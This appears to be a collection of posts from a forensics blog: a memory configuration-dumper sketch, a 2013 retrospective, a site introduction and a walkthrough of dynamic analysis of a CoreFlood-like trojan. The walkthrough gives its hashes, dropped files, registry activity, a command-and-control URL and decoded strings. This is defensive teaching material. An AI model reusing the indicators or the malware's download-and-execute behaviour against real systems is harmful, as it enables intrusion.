    CHAR campaign_id[12];
    CHAR password[16];
    DWORD heartbeat_interval;
    CHAR C2_domain[48];
    DWORD C2_port;
}

With this structure, and the data shown above, the malware reads each variable in and applies it to the structure. But, we can already see some discrepancies: the items are in a differing order, and some are of a different type. While the C2 port is seen as a string, '443', in the file, it appears as a DWORD once read into memory. That means that we'll be searching for 0x01BB (or 0xBB01 based on endianness) instead of '443'. Additionally, there are other values introduced that did not exist statically within the file to contend with.
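
The two byte orders are easy to generate rather than work out by hand. A quick Python 3 sketch using the standard struct module (dword_patterns is just a helper name I picked):

```python
import struct


def dword_patterns(value):
    """Return the little-endian and big-endian bytes of a 32-bit value."""
    return struct.pack('<I', value), struct.pack('>I', value)


little, big = dword_patterns(443)
print(little.hex(), big.hex())
# prints bb010000 000001bb
```

Either pattern can then be searched for in the memory region surrounding a known string, such as the campaign ID.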

An additional challenge is that depending on how the memory was allocated, there could be slack data found within the data. This can happen if the malware allocates memory with malloc() and never calls memset(), rather than using calloc().

When read and applied to the structure, this data may appear as the following:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   43 41 4D 50 41 49 47 4E  00 0C 0C 00 00 50 41 53   CAMPAIGN.....PAS
00000016   53 57 4F 52 44 00 00 00  00 00 00 00 00 00 17 70   SWORD..........p
00000032   68 74 74 70 3A 2F 2F 77  77 77 2E 65 76 69 6C 73   http://www.evils
00000048   69 74 65 2E 63 6F 6D 00  00 00 00 00 00 00 00 00   ite.com.........
00000064   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................
00000080   00 00 01 BB                                        ...»

We can see from this that our strategy changes considerably when writing a configuration dumper. The dumper won't be written based upon the structure in the file, but instead upon the data structure in memory, after it has been converted and formatted. We'll have to change our parser slightly to account for this. For example, if you know that the Campaign ID is 12 bytes, then read 12 bytes of data and find the null terminator to pull the actual string.
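
As a rough sketch of that approach, the fixed-width fields of the sample Configuration structure can be unpacked with Python 3's struct module. The field widths come from the structure above; the little-endian DWORDs, the absence of padding between fields, and the names c_string and parse_configuration are assumptions for illustration, and the sample buffer is built here rather than taken from a real dump.

```python
import struct

# CHAR[12], CHAR[16], DWORD, CHAR[48], DWORD (little-endian, unpadded: assumed)
LAYOUT = struct.Struct('<12s16sI48sI')


def c_string(raw):
    """Keep only the bytes before the first null terminator."""
    return raw.split(b'\x00', 1)[0].decode('ascii', 'replace')


def parse_configuration(blob):
    """Unpack one Configuration structure from the start of blob."""
    campaign, password, heartbeat, domain, port = LAYOUT.unpack(blob[:LAYOUT.size])
    return {
        'campaign_id': c_string(campaign),
        'password': c_string(password),
        'heartbeat_interval': heartbeat,
        'C2_domain': c_string(domain),
        'C2_port': port,
    }


# The campaign field carries slack bytes (0C 0C) after its terminator
sample = LAYOUT.pack(b'CAMPAIGN\x00\x0c\x0c\x00', b'PASSWORD', 6000,
                     b'http://www.evilsite.com', 443)

print(parse_configuration(sample))
```

Cutting each string at its first null keeps the slack bytes out of the report, and the DWORD fields come back as integers without any string handling.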

This just scratches the surface of what you can do with encrypted data in memory, but I hope it can inspire others to use this template code to make quick and easy configuration dumpers to improve their malware analysis.

A GhettoForensics Look Back on 2013

This site, Ghetto Forensics, was started this year as the beginning of an effort to better document some of the side work that I do that I thought would be appealing, or humorous, to the overall industry. This content was originally posted to my personal web site, thebaskins.com, but really needed a site of its own.

My first public project this year was reversing, documenting, and writing a parser for Java IDX files, cached files that accompany any file downloaded via Java. It was a bit of a painful project, mainly due to the bad documentation provided by Oracle, not to mention the horrendous style in which they designed it. I immediately released the code to the public and have received great feedback for improvements, as well as quite a few examiners touting how much they used it in their examinations. Thank you!

However, my greatest project this year was the release of Noriben. I first designed Noriben as a simple script for me to use at home for really quick malware dynamic analysis. I lacked many of the tools and sandboxes that I use at my day job, and needed a quick triage tool for research. After a few months, I realized that many commercial groups were in the exact same situation as I was at home: a severe lack of funding to purchase software to help. So, I cleaned up the code, gave it a silly name, and released it into the world. I've received a great deal of feedback and many suggestions from all over, all of which were incorporated into the code. While its usage is widely unknown, for practical reasons, I did learn of quite a few Defense organizations, as well as a handful of Fortune organizations that incorporated it into their workflow. Awesome!

Research-wise, I released a comparison of various Java disassembly and decompilation tools, having found the standard JD-GUI to be extremely lacking for modern Java malware. The positive side of this is introducing tools to security professionals that were previously unknown to them. The research itself changed the tools that I use on a regular basis and allowed me to create a better product, faster, for reversing Java applications.

For community projects, I wrote a small malware configuration dumper template for Volatility, based on some time-reducing work I've been practicing. Whenever I do a full reversal of malware, I now try to write a memory configuration dumper. That way, in a few months when they change the encryption routine, I can still retrieve the same configuration and get the report out instantly, then go back and figure out the encryption.





My greatest effort, however, is in a series of plugins and parsers for the Plaso supertimeline suite. This awesome forensic tool, created by Kristinn Gudjonsson, is an evolution of log2timeline. While we've performed timeline-based forensics since the beginning of time, this unique tool parses data files to retrieve the individual records within as additional events on the timeline. I started by first writing a parser for Java IDX files, based on my initial, stand-alone parser. I then wrote one for Windows scheduled task job files, then a plugin for bencoded (i.e. BitTorrent) files. It was a painful exercise, but only in that their stringent code review forced me to become a better programmer than I was. Through Kristinn's efforts I've been able to write much cleaner and more efficient code, and can now attack parsers quickly. I find writing parsers for Plaso to provide a great sense of community involvement, and I recommend that others, who may be proficient at Python, contribute in their own capacity.

Changes to Forensic Work Processes


The biggest success so far this year in my file system forensics work has been in moving my dead box forensics to X-Ways Forensics. After working an exam that required X-Ways (due to XFS file systems), I quickly fell in love with just how fast and easily I can cut through systems. As X-Ways keeps track of every file already viewed (with a green highlight), large 20-system cases fell easily as duplicate files/folders could immediately be excluded based solely on that green color. No more 10-step program just to run searches, and no 30-minute waits to reparse the MFT after every time EnCase crashes. Not to mention that it can be quickly picked up without guidance, unlike other software that exists solely to drive a lucrative training business.

The necessity for change, and for a varied toolkit, is found in the wide ranges of media encountered. My past three exams contained file systems that were not able to be parsed by EnCase 6, including XFS and Ext4. Interestingly, support for XFS wasn't found in any other product, surprisingly not even Sleuthkit/Autopsy. When I spoke with Brian Carrier about this at the Open Source Digital Forensics Conference (OSDFC), the reasoning was that until there is an adequate demand for a file system parser, the work isn't performed. File systems require an extreme amount of effort for a relatively volatile market. This makes logical sense, as just a few years ago everyone was enthusiastic about ReiserFS... luckily the effort hadn't moved forward on that file system.

Beyond the standard forensic tools, there is great value in forensic examiners learning penetration testing procedures. This goes a bit beyond the 'hacking for forensic examiners' training I helped put on years ago. It's about using a better range of tools to succeed in our jobs. At the right focal point, there is a large intersection in the tasks of forensic examiners and penetration testers and there is a great benefit to trying to use a tactic from 'the other side'.  For example, I am routinely using oclHashCat with a 5GB dictionary to crack obtained user passwords from Windows and Linux/OSX systems. After all, a password is one of the best fingerprints you can get for tying multiple accounts together and attributing them to a user.

Reversing Challenges


A majority of my work is in malware analysis and reverse engineering -- two completely different jobs. The latter has many aspects that have eluded me for years, topics that just can't be learned on the job. 

The best exercise to combat these issues is in continual testing through exercises. There are numerous CrackMe, UnPackMe, and KeygenMe challenges across the internet. One notable set this year was the Microsoft Bluehat Challenge. This challenge consisted of three separate gauntlets: Vulnerability Discovery, Web Design Vulnerabilities, and Reverse Engineering. I started on the Reverse Engineering challenge, but quickly realized the burden of doing this challenge when you only have 1-2 hours of work "downtime" per week. After a month, I threw in the towel on challenges 4 and 5: the former required debugging an algorithm with floating point math, and the latter required reversing C++ Virtual Function Tables. Like many who just do malware analysis without much reversing, I've always just ignored the presence of vftables and focused on functionality, so this was a huge gut punch that stopped me in my tracks.

Industry Conferences


After a long conference circuit in 2011, I took it easy in 2012, and planned to as well in 2013. As conferences and training are out of pocket, and since I had just bought a home, I had no expectations of traveling this year.

However, I was able to attend the first-ever BSidesNOLA in New Orleans. While there was a great mixture of topics and speakers, there was a heavier component of forensics and incident response than in most other conferences. Run by an extremely talented group of foodies, even the chosen taco food truck obliterated my expectations. I'll be looking to return in 2014, if I can secure enough funding.

I also had the pleasure of attending the Open Source Digital Forensics Conference (OSDFC), put on by Basis Tech. I had attended only once prior and found it a great mixing bowl of academia and practitioners, where most of the core open source developers drink whisky alongside forensic examiners and discuss techniques.

The OSDFC was heralded in by the Open Memory Forensic Workshop (OMFW) put on by the core developers of Volatility. After a jam-packed series of technical talks given at the rate of a machine gun, the only emotion I could come to was... humbled. Here are the folks who are utterly conquering a new battlefield of forensics. And that was my opinion after having already done basic memory forensics for a few years.

On request, I put together a new talk this year on Introducing Intelligence into your Malware Analysis (video link).  I first gave it to the CyberGamut group, and carried it on to the inaugural BSidesDC and then BSidesDE (Delaware). The talk was targeted towards malware analysts in smaller organizations who are facing an uphill battle of malware and attacks. Using the currently accepted Cyber Kill Chain model, the talk broke down a typical malware analysis into phases that can be acted upon immediately, delegated, or stored for later processing. Given the right structure and intelligence, an analyst should be able to get actionable intel back from a malware sample within minutes, not hours, by focusing on the core indicators. This means putting the reversing of a custom encryption routine on the back burner and getting the components needed to build rules for file system and network monitoring.

One notable point about 2013 was the lack of conferences I attended, as well. Due to buying a house, and since conferences are out of pocket for me, I had to turn down attending (and speaking at) a handful of conferences this year, notably DEFCON, BSidesLV, and DerbyCon. DerbyCon will always remain one of my favorites, and I was sad to miss it for the first time, but my fingers are crossed for next year.

Goals and Efforts for 2014

To keep myself honest, here are some of my ideas of things to continue or improve upon for 2014:

  • I will continue development on Noriben. It's currently undergoing a massive rewrite that will eventually allow it to automatically request VirusTotal results and transmit dropped files, given a legitimate public API key. More features will be implemented as requested.  Have an idea? Let me know!
  • I will continue to crack away at the Microsoft BlueHat Challenges. Being literally stuck on the RE samples, I suspect continued progress will result from a dream-induced epiphany, but I'll take anything I can get.
  • I will attempt the Matasano Cryptography challenges. Crypto plays a large part in the malware analysis field, with one-time cipher pads and iterative variants of RC4 popping up every week. I haven't attempted these challenges, but plan to once a sizable amount of free time appears (hah!).
  • I will improve my programming abilities, which starts with creating more class-based Python code, and is fostered by participation in challenges like Matasano's.
  • I will strive to get better at reversing, well... everything. Working in a reverse engineering environment where samples switch between C, C++, Delphi, and .NET on a regular basis, I know that I need to improve at the intricacies of these individual languages.

Ghetto Forensics!

While I have maintained a blog on my personal website (www.thebaskins.com) for many years, the process of creating new posts on it has become cumbersome over time. As I perform more technical posts, they felt out of place on a personal site. After some weeks of contemplation, I've forked my site to place my new technical content on a site for itself, here, at Ghetto Forensics.

Why Ghetto Forensics? Because this is the world in which we operate. For every security team operating under a virtually unlimited budget, there are a hundred that are cobbling together a team on a shoestring budget using whatever tools they can. This is the world I've become used to in my long career in security, where knowledgeable defenders make do as virtual MacGyvers: facing tough problems with a stick of bubble gum, a paperclip, and some Python code.

Many don't even realize they're in such a position. They've created an environment where they are continually on the ball and solving problems, until they are invited to a vendor demonstration where a $10,000 tool is being pitched that does exactly what their custom script already performs. Where an encrypted file volume isn't met with price quotes, but ideas such as "What if we just ran `strings` on the entire hard drive and try each as a password?".

Ghetto forensics involves using whatever is at your disposal to get through the day. Ghetto examiners don't have the luxury of spending money to solve a case, or buying new and elaborate tools. Instead, their focus is to survive the day as cheaply and efficiently as possible.

Have a tough problem? No EnScript available? Then work through five different, free tools, outputting the results from one to another, until you receive data that meets your demands. Stay on top of the tools, constantly reading blog posts and twitter feeds of others, to see what is currently available. Instead of swishing coffee in a mug while waiting for keyword indexing, having the luxury of weeks to perform an examination, you are multitasking and updating your procedures to go directly after the data that's relevant to answering the questions. Fix your environment so that you can foresee and tackle that mountain of looming threats instead of constantly being responsive to incidents months after the fact.

These are many of the ideals I've learned from and taught others. While others adopted the mentality of posting questions to vendors and waiting for a response, we've learned to bypass corporate products and blaze our own trails. When I helped develop a Linux Intrusions class in 2002, the goal was to teach students how to investigate a fully-fledged network intrusion on their zero-dollar budgets. We used Sleuthkit, and Autopsy, and OpenOffice. We created custom timelines and used a free spreadsheet (Quattro) to perform filtering and color-coding. Students learned how to take large amounts of data and quickly cull it down to notable entries using grep, awk, and sed. And, when they returned to their home offices, they were running in circles around their co-workers who relied upon commercial, GUI applications. Their task became one of not finding which button to click on, but asking "what data do I need, and how do I extract it?"

Join me as we celebrate Ghetto Forensics, where being a Ghetto Examiner is a measure of your ingenuity and endurance in a world where you can't even expense parking.

Malware with No Strings Attached - Dynamic Analysis

I had the honor of lecturing for Champlain College's graduate level Malware Analysis course this week. One of the aspects of the lecture was showing off dynamic analysis with my Noriben script and some of the indicators I would look for when running malware.

While every malware site under the sun can tell you how to do malware dynamic analysis, I wanted to write a post on how I, personally, perform dynamic analysis. Some of the things I look for, some things I've learned to ignore, and how to go a little bit above and beyond to answer unusual questions. And, if the questions can't be answered, how to obtain good clues that could help you or another analyst understand the data down the road.

Additionally, I've been meaning to write up a malware analysis post for a while, but haven't really found any malware that's been interesting enough. Most were overly complex, many overly simple, and most just too boring to write on. Going back through prior incidents, I remembered a large scale response we worked involving a CoreFlood compromise. While this post won't be on the same malware, it's from a similar variant:

MD5: 4f45df18209b840a2cf4de91501847d1
SSDEEP: 768:ofATWbDPImK/fJQTR5WSgRlo5naTKczgYtWc5bCQHg:uk6chnWESgRKcnWc5uF
Size: 48640 bytes

This is not a ground-breaking malware sample. The techniques here are not new. I want to simply show a typical workflow of analyzing malware and overcoming the challenges that appear in doing so.

There are multiple levels of complexity to this sample, too much for a single post, including ways in which it encrypts embedded data and strings. Therefore, this post will focus on the dynamic artifacts of running the malware and examining the files left behind. On the next post, we'll use IDA Pro to dig deeper into reversing the logic used by the malware.



The analysis in this post will cover analysing malware challenges from various angles. While it discusses the processes of basic dynamic analysis, the emphasis is on seeing malware analysis as a series of logic puzzles. Instead of just running tools, we'll cover various methods to solve these challenges.

I invite any opinions or suggestions on other procedures that could be used to analyze this data. It's how we all learn.

Let's first explore the sample file itself at a basic static level. At the advice of my friend and former colleague, Brian Moran (of Bri Mor Labs), I've adopted PeStudio:




PeStudio noted 167 Unclassified strings which could also be obtained via SysInternals Strings. Extracting these strings, and removing basic API calls, shows:

3etProcAddr
Control Panel\Accessibility\TimeOut
TimeToWait
\system32\winnls.dll
kernel32.dll
RegOpenKeyExA
advapi32.dll
MlLrqtuhA3x0WmjwNM27

I left these specific API and library calls here for a reason (explained in the next post). I'll let you form your own opinion of the severity of these strings. Manual analysis of the executable to find these strings shows that they were at the end of the .rsrc (Resource) section. 
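For readers without PeStudio or SysInternals Strings at hand, the same kind of listing can be roughly approximated in a few lines of Python. This is only a minimal sketch: the function name extract_strings and the four-character minimum are my own assumptions, it handles plain ASCII only (no UTF-16), and the sample bytes are made up for illustration rather than taken from the malware.

```python
import re


def extract_strings(data, min_len=4):
    """Return runs of printable ASCII that are at least min_len bytes long."""
    # 0x20-0x7e covers the printable ASCII range, space through tilde.
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


if __name__ == "__main__":
    # Made-up bytes standing in for a slice of an executable.
    sample = b"\x00\x01kernel32.dll\x00\xffRegOpenKeyExA\x00ab\x00"
    for text in extract_strings(sample):
        print(text)
```

Running it against a real file is a matter of reading the file in binary mode and passing the bytes in; filtering out known API names is left to whatever list you trust.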

Runtime Analysis


I'll start by configuring a VM with basic runtime tools: FakeNet, Capture-BAT, Procmon, and Noriben. I launch the malware executable and then sit back. After a few seconds I see web traffic appear in FakeNet, so I stop the monitoring and review the results.

After doing some light cleaning of the Noriben results, removing items that are not relevant and duplicate items, I see the following results:

Processes Created:
==================
[CreateProcess] Explorer.EXE:1596 > "%UserProfile%\Desktop\malware.exe"[Child PID: 1548]

File Activity:
==================
[CreateFile] malware.exe:1548 > %AppData%\Adobe\shed\thr1.chm[MD5: e26316552f1b9cbc4943d22bc3d35adc]
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\History
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5
[CreateFile] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat[MD5: e736f02e53e55d0869c6ae90c9c8bf00]
[CreateFolder] malware.exe:1548 > %UserProfile%\Cookies
[CreateFile] malware.exe:1548 > %UserProfile%\Cookies\index.dat[MD5: d7a950fefd60dbaa01df2d85fefb3862]
[CreateFolder] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\SG0UEJSI\showthread[1].htm[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]
[CreateFolder] malware.exe:1548 > %AppData%\Adobe\plugs
[RenameFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe => %AppData%\Adobe\plugs\mmc61753109.txt
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 8c4840ab4f47b1b563ce850b12d3c0db]
[CreateFile] malware.exe:1548 > %AppData%\Adobe\plugs\mmc109.exe[MD5: 1e3ab8a8a419459fb8c169c08ea62fcf]

Registry Activity:
==================
[RegCreateKey] malware.exe:1548 > HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[RegCreateKey] malware.exe:1548 > HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings
[RegSetValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy  =  1
[RegCreateKey] malware.exe:1548 > HKCU\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
[RegSetValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable  =  0
[RegDeleteValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
[RegDeleteValue] malware.exe:1548 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
[RegCreateKey] malware.exe:1548 > HKLM\Software\Microsoft\DownloadManager

There are a few things that pop out at me upon reviewing this. Mostly, there's only one active file in play, our malware.exe. While it creates other files, these dropped files are neither executed nor entrenched as additional executable components. That means all functionality that we need is in our malware.exe... does the brevity of those Strings above concern you more now?

I see the tell-tale signs of the malware using Internet Explorer API calls to make HTTP connections. The downloaded file of showthread[1].htm shows an attempt to go out to the internet and download a file. 

I see a dropped file to %AppData%\Adobe\shed\thr1.chm with an MD5 value that is not duplicated elsewhere.

I also see multiple writes to a file of %AppData%\Adobe\plugs\mmc109.exe. While all of these files have the same MD5 value, this is not something you can trust; those MD5s are assigned by Noriben after runtime. So, the content could have changed between each write. There were actually dozens of continual writes to that same file, many of which were removed here for brevity. Could this be a keylog file?

But, why does this file almost always end up with the same hash value as the downloaded file, showthread[1].htm, except for one instance where it has another unique hash value?

And why is not a single file deleted?

Curiouser and Curiouser.

Registry analysis shows little that pops out. The HKCU\...\Internet Settings keys are written normally whenever Internet Explorer is launched benignly. Unless there's something later to tell me these were used directly by the malware, I'll ignore them as background noise associated with an action performed by the malware (downloading a file).

Let's switch gears to the FakeNet network capture output, stored as a PCAP file. Opening this file in WireShark I see two DNS requests: adobe.com and presentpie.vv.cc. Following TCP traffic, I then see HTTP requests going to each of these respective domains:

adobe.com:




presentpie.vv.cc:



You'll note that all of the HTTP GET requests are for the same URI, containing "t=332864" which is a bit of an oddity. If you have the ability to create a random number to put in this field, why not do so?

At this point, there are a few things that we need to determine:
  • What is the purpose of that %AppData%\Adobe\shed\thr1.chm file?
  • Are the contents of showthread[1].htm what FakeNet would send?
  • Why is %AppData%\Adobe\plugs\mmc109.exe almost always the same hash value as showthread[1].htm?
  • Why was mmc109.exe renamed to mmc61753109.txt?
This is the point where most automated analysis tools, and many analysts, stop. But, there's a whole cornucopia of cool stuff left undiscovered.


Level 2 (Digging Deeper)


Opening thr1.chm up in a hex viewer shows very interesting contents:



At only 49 bytes, and only written at initial runtime, my first thought is that this is configuration data used by the malware. The data is obviously not Base64 encoded, so maybe a basic XOR routine? I see few patterns, no repeated sequential characters, and very few repeated bytes, so likely not a single-byte XOR. We'll need to do static analysis to figure out the structure and purpose of this file completely.
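The eyeball test above can be backed up with a quick count. The sketch below is an illustration only: byte_stats is a hypothetical helper, and the input shown is made up rather than the real thr1.chm contents. The reasoning is that a single-byte XOR maps identical plaintext bytes to identical output bytes, so a file with almost no repeated bytes or runs is a poor fit for it.

```python
from collections import Counter


def byte_stats(data):
    """Summarize repetition in a small blob: distinct bytes and longest run."""
    counts = Counter(data)
    longest_run = run = 1 if data else 0
    for previous, current in zip(data, data[1:]):
        # Extend the run while the same byte repeats, otherwise restart it.
        run = run + 1 if current == previous else 1
        longest_run = max(longest_run, run)
    return {
        "length": len(data),
        "distinct": len(counts),
        "most_common": counts.most_common(3),
        "longest_run": longest_run,
    }


if __name__ == "__main__":
    # Made-up input; substitute the bytes read from the dropped file.
    print(byte_stats(b"AAAB\x00\x00\x00\x00config"))
```

A high distinct-to-length ratio and a longest run of 1 are consistent with what the hex view suggested, though neither proves which routine was used.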

Second, let's view the showthread[1].htm file. A quick visual scan shows that it's a standard FakeNet HTML page:

<p class=MsoNormal>This is the help file for <span class=SpellE>FakeNet</span>
version 1.0.<span style='mso-spacerun:yes'>  </span>This program must be run
with administrator privileges. <span style='mso-spacerun:yes'> </span>If you
like this tool and are interested in malware analysis, please consider
purchasing Practical Malware Analysis from No Starch Press.<span
style='mso-spacerun:yes'>  </span>It contains lots of great information to help
you become a skilled malware analyst.</p>

Running an MD5 hash of this file gives 1e3ab8a8a419459fb8c169c08ea62fcf, the same value we see repeated in our Noriben results. This makes a bit of sense. The malware requests showthread.php from some remote site (which Internet Explorer caches as showthread[1].htm), expects it to be a legitimate, un-encrypted executable, and copies it to %AppData%\Adobe\plugs\mmc109.exe. This downloaded file is very likely a second-stage trojan.
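Since Noriben's hashes are taken after the run, it can be worth hashing the files yourself at the moment you care about. A minimal sketch with Python's hashlib follows; the helper names md5_of_stream and md5_of_file are mine, and the demo uses stand-in bytes rather than the real cached page.

```python
import hashlib
import io


def md5_of_stream(stream, chunk_size=65536):
    """Hash a binary file-like object in chunks to keep memory use flat."""
    digest = hashlib.md5()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def md5_of_file(path):
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as handle:
        return md5_of_stream(handle)


if __name__ == "__main__":
    # Stand-in content; in practice, call md5_of_file() on the cached page
    # and on the dropped file, then compare the two digests.
    page = b"<p>stand-in for the FakeNet page</p>"
    cached = md5_of_stream(io.BytesIO(page))
    dropped = md5_of_stream(io.BytesIO(page))
    print(cached, cached == dropped)
```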

But, why does mmc109.exe sometimes have a different hash value? Upon ending my runtime, the file had the 8c4840ab4f47b1b563ce850b12d3c0db hash value. Opening it in a hex editor shows a possible answer:



This file is encrypted. The style looks similar to that seen in thr1.chm, and it's very likely that the same encryption/decryption routine was used for both files.

This suggests that the malware sample downloads a file, encrypts it, and saves it to mmc109.exe. The hash varies possibly because the malware routinely decrypts it for execution, then re-encrypts it afterward. Maybe we saw no additional processes created because it wasn't a valid executable? Can we test this? Absolutely! Instead of using the FakeNet fake HTML page, replace it with calc.exe and re-run the malware:

Processes Created:
==================
[CreateProcess] Explorer.EXE:1596 > "%UserProfile%\Desktop\malware.exe"[Child PID: 2000]
[CreateProcess] malware.exe:2000 > "%AppData%\Adobe\plugs\mmc188.exe"[Child PID: 856]
[CreateProcess] malware.exe:2000 > "%AppData%\Adobe\plugs\mmc188.exe"[Child PID: 444]

Upon running the malware, the Windows calculator opens. And opens again... and again. Additionally, we also now know that the three digit number after 'mmc' varies per runtime.

The last question was to find the purpose of the mmc61753109.txt file. We see the malware rename mmc109.exe to this file, then create another mmc109.exe. The mmc61753109.txt file had the same MD5 hash value of 8c4840ab4f47b1b563ce850b12d3c0db, and a quick look in the hex editor shows that it's the encrypted version of the downloaded file. Maybe it's a backup of the second-stage malware?

From this level of analysis we now know what the showthread[1].htm file is and that it is copied to mmc109.exe, but we're left with a few more questions:
  • What is the encryption routine used for thr1.chm and mmc109.exe?
  • Why does the malware rename mmc109.exe to mmc61753109.txt?
  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
  • Why is none of this functionality apparent based on the strings extracted from the malware?
Some of these can only be solved via static analysis. Some analysts would likely stop at this point, noting these questions for future analysis. 

We won't :)

Level 3 (Memory Analysis)


The big question is how many of these questions we can answer based on dynamic analysis, and which require us to use a tool like IDA Pro or Hopper to reverse the malware in static analysis, or at least a Debugger to step through the malware's operation.

We can take an initial stab at the encryption routine, but it won't be as effective as a static analysis. To do this, we have to define the constants and the variables in the encryption routine. We have a known decrypted set of data (the FakeNet HTML output), and a known encrypted version of the file. If you run the malware again, you'll find the encrypted results are identical, suggesting that there's no random seed used in the encryption, or that the data is simply encoded.
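With a known plaintext and its matching ciphertext in hand, one cheap first test is to XOR the two together and look at what falls out. The sketch below assumes, purely for illustration, that the routine is a repeating-key XOR; nothing at this stage of the analysis confirms that, and the key 1337c0de is made up. The helper names xor_bytes and repeating_period are also my own.

```python
from itertools import cycle


def xor_bytes(a, b):
    """XOR two byte sequences together, stopping at the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def repeating_period(stream, max_len=64):
    """Return the smallest period that repeats at least twice, or None."""
    for size in range(1, min(max_len, len(stream) // 2) + 1):
        if all(stream[i] == stream[i % size] for i in range(len(stream))):
            return size
    return None


if __name__ == "__main__":
    demo_key = bytes.fromhex("1337c0de")  # hypothetical key for the demo
    plaintext = b"This is the help file for FakeNet version 1.0."
    ciphertext = xor_bytes(plaintext, cycle(demo_key))

    # plaintext XOR ciphertext yields the keystream if the scheme is XOR-based.
    keystream = xor_bytes(plaintext, ciphertext)
    period = repeating_period(keystream)
    print(period, keystream[:period].hex() if period else "no short period")
```

If no short period shows up against the real files, that is a hint the routine is something other than a simple repeating XOR, which is useful to know before opening a disassembler.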

Encoding versus Encryption is splitting hairs on routines. Typically if data is transformed via a simple byte-by-byte operation (add, subtract, XOR), we consider it encoding. If data is transformed via a cipher pad, key scheduler, or similar routines, then we consider it encryption. For the sake of this post, we'll consider everything encryption until we know better.

We can also try to determine if the encryption routine is stream-based or block-based. Take the original FakeNet document and leave the first 16 bytes intact. Modify the 16 bytes following those to a series of all the same character. Re-run the malware and analyze the encrypted results. You'll find the first 16 encrypted bytes remain the same, while the modified 16 bytes have changed... and the remainder of the file is identical to the first run. You can then repeat this by changing a single byte in the first 16 bytes, from the end to the beginning, and seeing how much of the encrypted text changes. You'll basically be narrowing the size of your encryption window over time until you see how large it is.

This is a long process, but it will eventually tell you that data is encrypted 4-bytes (DWORD) at a time. It's also something we could have determined with static analysis in just 30 seconds :)
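Comparing the encrypted output of each run by eye gets tedious, so a small diff helper can report exactly which offsets changed. This is a sketch only: changed_ranges is a hypothetical name, and the byte strings in the demo are placeholders for two encrypted files captured from separate runs.

```python
def changed_ranges(first, second):
    """Return (start, end) offsets, end exclusive, where the inputs differ."""
    ranges = []
    start = None
    limit = min(len(first), len(second))
    for offset in range(limit):
        if first[offset] != second[offset]:
            if start is None:
                start = offset  # a new differing region begins here
        elif start is not None:
            ranges.append((start, offset))
            start = None
    if start is not None:
        ranges.append((start, limit))
    return ranges


if __name__ == "__main__":
    # Placeholder data standing in for two encrypted outputs.
    run_one = b"AAAABBBBCCCCDDDD"
    run_two = b"AAAAXXXXCCCCDDDD"
    for start, end in changed_ranges(run_one, run_two):
        print("changed 0x%x-0x%x (%d bytes)" % (start, end, end - start))
```

Changing one plaintext byte per run and watching the size and alignment of the reported range is the same window-narrowing process described above, just with less squinting.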

As far as the strings, we'll need to shift our focus to memory analysis with Volatility:

> v.py -f XP_VM.vmem pslist
Volatile Systems Volatility Framework 2.3_beta
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ -----
0x829c8830 System                    4      0     56     2290 ------      0
0x820ab1f8 malware.exe            1548   1596      6     3255      0      0 2014-02-08 17:06:10 UTC+0000

With the malware PID found, let's dump the executable from memory space. During runtime, malware may decode data in-place from within its own data. If so, the latest version of the executable from RAM will contain the same code but decoded strings. To do this, we'll use Volatility's procexedump to carve out the usable executable space from memory. Alternatively, procmemdump can be used to do the same, but with the inclusion of slack space within the memory heaps.

E:\VMs\XP_VM>v.py -f XP_VM.vmem procexedump -p 1548 -D .
Volatile Systems Volatility Framework 2.3_beta
Process(V) ImageBase  Name                 Result
---------- ---------- -------------------- ------
0x820ab1f8 0x00400000 malware.exe          OK: executable.1548.exe

With this file dumped, I'll do a quick strings/grep to see if it contains any of the static indicators I saw in Noriben's output:

> strings executable.1548.exe | grep -E -i "presentpie|mmc|shed"
shed
shedexec:thr1:
\shed
mmc
delshed
mmc_install
delshedexec
shedexec
shedscr:3:120 http://presentpie.vv.cc/showthread.php?t=332864

Now we're cooking with fire. Dumping strings from this new executable gives us:

id=
solutions.html
oodmansof
ansoft
shed
scr:
ZZZZ
shedexec:thr1:
ZZZ
Hui
Member Window
\Ad
obe
\shed
.cer
 .e
\msh
.ex
err.log
SystemDrive
POST /
 HTTP/1.1
Host: 
User-Agent: Opera/10.80 Pesto/2.2.30
Content-Type: application/x-www-form-urlencoded
Content-Length: 
